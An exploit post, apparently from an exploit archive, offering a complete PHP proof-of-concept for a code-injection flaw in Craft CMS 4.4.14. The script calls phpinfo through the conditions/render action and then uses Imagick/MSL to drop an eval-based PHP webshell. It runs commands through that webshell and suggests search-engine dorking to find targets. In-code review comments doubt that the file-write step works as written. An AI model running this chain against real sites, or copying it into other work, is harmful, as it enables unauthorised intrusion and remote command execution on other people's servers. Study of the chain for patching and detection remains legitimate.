Craft CMS 4.4.14 Code Injection
Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability: the `conditions/render` controller action accepts a caller-supplied object configuration, which the proof of concept below uses to instantiate arbitrary classes (GuzzleHttp FnStream for information disclosure, Imagick for a file write).
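=============================================================================================================================================
| # Title : Craft CMS 4.4.14 Code Injection Vulnerability                                                                                    |
| # Author : indoushka                                                                                                                        |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                             |
| # Vendor : https://craftcms.com/                                                                                                            |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.
[+] Uses PHP's HTTP stream wrapper (file_get_contents + stream_context_create) to send the requests; no cURL extension is needed.
[+] Pass the target base URL as the first argument, or edit the fallback in the "Usage" section at the bottom.
[+] Save the code as poc.php.
[+] Usage : cmd => c:\www\test\php poc.php http://target-craftcms.com
[+] PayLoad :

<?php
/**
 * Proof-of-concept client for the Craft CMS 4.4.14 "conditions/render" code-injection chain.
 *
 * Flow, as implemented below:
 *   1. check_phpinfo()   - POSTs an object configuration to action=conditions/render that
 *                          instantiates GuzzleHttp\Psr7\FnStream with a "close" method of
 *                          phpinfo, then scrapes upload_tmp_dir and DOCUMENT_ROOT out of
 *                          the returned HTML.
 *   2. upload_webshell() - POSTs a second configuration that instantiates Imagick with an
 *                          MSL "files" source, intending to write a PHP file under
 *                          DOCUMENT_ROOT.
 *   3. execute_command() - POSTs a base64-encoded command to the dropped file.
 *
 * NOTE(review): as written, the MSL document is sent as a plain form field named
 * "payload" (no filename=, so PHP creates no temporary upload file) and the Imagick
 * "files" value is "msl:/dev/null". It is not clear from this code what Imagick would
 * actually read, so step 2 may not succeed against a real target; the 502 heuristic used
 * as the success signal is weak and does not confirm that a file was written.
 * Use only against systems you are authorised to test.
 */
class CraftCMSExploit
{
    /** Alphabet used for random parameter / file names. */
    private const CHARSET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';

    /** @var string Base URL of the target (scheme + host [+ path]); trailing slash removed. */
    private $target_uri;

    /** @var string File name of the PHP file the Imagick step tries to write. */
    private $webshell;

    /** @var array{upload_tmp_dir: ?string, document_root: ?string} Values scraped from phpinfo(). */
    private $config = ['upload_tmp_dir' => null, 'document_root' => null];

    /** @var string Name of the POST parameter the dropped file reads its command from. */
    private $post_param;

    /** @var string Not used by any method; kept so the object shape matches the original PoC. */
    private $get_param;

    /** @var int|null HTTP status code of the last request, null when no response was received. */
    private $last_status = null;

    /**
     * @param string $target_uri Base URL of the Craft CMS site. execute_command() appends
     *                           '/' . $webshell to it, so it should be the site root, not
     *                           a deeper endpoint such as /index.php.
     * @param string $webshell   File name to write; a random "<letters>.php" when empty.
     */
    public function __construct($target_uri, $webshell = '')
    {
        $this->target_uri = rtrim((string) $target_uri, '/');
        $this->webshell = $webshell !== '' ? $webshell : $this->generateRandomString(8, 16) . '.php';
        $this->post_param = $this->generateRandomString(1, 8);
        $this->get_param = $this->generateRandomString(1, 8);
    }

    /**
     * Step 1: trigger phpinfo() through conditions/render and record upload_tmp_dir and
     * DOCUMENT_ROOT in $this->config. Silently leaves $this->config untouched when the
     * request fails or the response does not look like phpinfo() output.
     */
    public function check_phpinfo()
    {
        $data = http_build_query([
            'action' => 'conditions/render',
            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',
            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}',
        ]);

        $response = $this->sendPostRequest($this->target_uri, $data);
        if ($response) {
            $this->parsePHPInfo($response);
        }
    }

    /**
     * Scrape upload_tmp_dir and DOCUMENT_ROOT from phpinfo() HTML.
     *
     * phpinfo() rows look like <td class="e">name</td><td class="v">value</td>; an unset
     * directive renders its value as <i>no value</i>, so tags are stripped before the
     * comparison (the original compared the raw cell, which never equalled 'no value').
     *
     * @param string $response Raw HTML body.
     */
    private function parsePHPInfo($response)
    {
        if (preg_match('/upload_tmp_dir.*?<td class="v">(.*?)<\/td>/is', $response, $matches)) {
            $value = trim(strip_tags($matches[1]));
            $this->config['upload_tmp_dir'] = ($value === '' || $value === 'no value') ? '/tmp' : $value;
        }
        if (preg_match('/DOCUMENT_ROOT.*?<td class="v">(.*?)<\/td>/is', $response, $matches)) {
            $value = trim(strip_tags($matches[1]));
            if ($value !== '') {
                $this->config['document_root'] = $value;
            }
        }
    }

    /**
     * Step 2: send the Imagick/MSL configuration together with an MSL document that writes
     * a PHP file under DOCUMENT_ROOT.
     *
     * Requires check_phpinfo() to have found DOCUMENT_ROOT first; without it the write
     * target would be "info:/<name>.php", so the method refuses and returns false.
     *
     * @return bool True when the server answered 502 (the original author's success
     *              heuristic, presumably a crashed PHP worker) - not a confirmation that
     *              the file exists.
     */
    public function upload_webshell()
    {
        if ($this->config['document_root'] === null) {
            error_log('upload_webshell: DOCUMENT_ROOT unknown - run check_phpinfo() first');
            return false;
        }

        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> <image> <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" /> <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" /> </image>";

        $form_data = [
            'action' => 'conditions/render',
            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',
            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',
            'payload' => $payload,
        ];

        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);

        // Prefer the real status line; fall back to the original body-text heuristic.
        if ($this->last_status === 502) {
            return true;
        }
        return is_string($response) && strpos($response, '502') !== false;
    }

    /**
     * Step 3: run a shell command through the dropped file.
     *
     * @param string $cmd Command to base64-encode and POST under $this->post_param.
     * @return string|false Response body, or false when the request failed.
     */
    public function execute_command($cmd)
    {
        $data = http_build_query([$this->post_param => base64_encode($cmd)]);
        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);
    }

    /**
     * POST an application/x-www-form-urlencoded body.
     *
     * @param string $uri
     * @param string $data Already-encoded query string.
     * @return string|false
     */
    private function sendPostRequest($uri, $data)
    {
        return $this->sendRequest($uri, 'application/x-www-form-urlencoded', $data);
    }

    /**
     * POST a multipart/form-data body built from $data.
     *
     * The boundary announced in the Content-Type header must be the same string the body
     * parts are delimited with ("--" . boundary, RFC 2046 s5.1.1). The original code
     * prefixed the body delimiter with six extra dashes, so PHP's multipart parser would
     * not have matched any part and no field would have reached the application.
     *
     * @param string $uri
     * @param array<string, string> $data Field name => value.
     * @return string|false
     */
    private function sendMultipartPostRequest($uri, $data)
    {
        $boundary = bin2hex(random_bytes(12));
        $post_data = $this->buildMultipartData($data, $boundary);
        return $this->sendRequest($uri, 'multipart/form-data; boundary=' . $boundary, $post_data);
    }

    /**
     * Shared transport: one POST via the HTTP stream wrapper.
     *
     * ignore_errors is set so that 4xx/5xx replies still return their body instead of
     * making file_get_contents() return false - without it the 502 check in
     * upload_webshell() could never see the response. The status code is recorded in
     * $this->last_status from $http_response_header, which the wrapper populates in this
     * scope.
     *
     * @param string $uri
     * @param string $content_type
     * @param string $body
     * @return string|false Body, or false on a transport failure (a PHP warning is emitted).
     */
    private function sendRequest($uri, $content_type, $body)
    {
        $context = stream_context_create([
            'http' => [
                'method' => 'POST',
                'header' => "Content-Type: {$content_type}\r\n",
                'content' => $body,
                'ignore_errors' => true,
                'timeout' => 30,
            ],
        ]);

        $this->last_status = null;
        $response = file_get_contents($uri, false, $context);

        if (isset($http_response_header[0])
            && preg_match('#^HTTP/\S+\s+(\d{3})#', $http_response_header[0], $m)) {
            $this->last_status = (int) $m[1];
        }

        return $response;
    }

    /**
     * Serialise fields as multipart/form-data parts (plain fields only, no file parts).
     *
     * @param array<string, string> $data      Field name => value.
     * @param string                $delimiter Boundary string; each part starts with "--" . $delimiter.
     * @return string
     */
    private function buildMultipartData($data, $delimiter)
    {
        $parts = [];
        foreach ($data as $name => $content) {
            $parts[] = "--{$delimiter}\r\n"
                . "Content-Disposition: form-data; name=\"{$name}\"\r\n\r\n"
                . "{$content}\r\n";
        }
        return implode('', $parts) . "--{$delimiter}--\r\n";
    }

    /**
     * Random ASCII-letter string of length in [$min, $max].
     *
     * Uses random_int() rather than rand()/str_shuffle(): the original could never repeat
     * a character and was seeded from a non-CSPRNG.
     *
     * @param int $min
     * @param int $max
     * @return string
     */
    private function generateRandomString($min, $max)
    {
        $length = random_int((int) $min, (int) $max);
        $alphabet_max = strlen(self::CHARSET) - 1;
        $out = '';
        for ($i = 0; $i < $length; $i++) {
            $out .= self::CHARSET[random_int(0, $alphabet_max)];
        }
        return $out;
    }
}

// Usage: php poc.php http://target-craftcms.com
// Only runs when this file is executed directly, so the class can also be included elsewhere.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $target = $argv[1] ?? 'http://target-craftcms.com';
    $exploit = new CraftCMSExploit($target);
    $exploit->check_phpinfo();
    if ($exploit->upload_webshell()) {
        echo $exploit->execute_command('whoami');
    }
}
?>

Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
|===================================================================================================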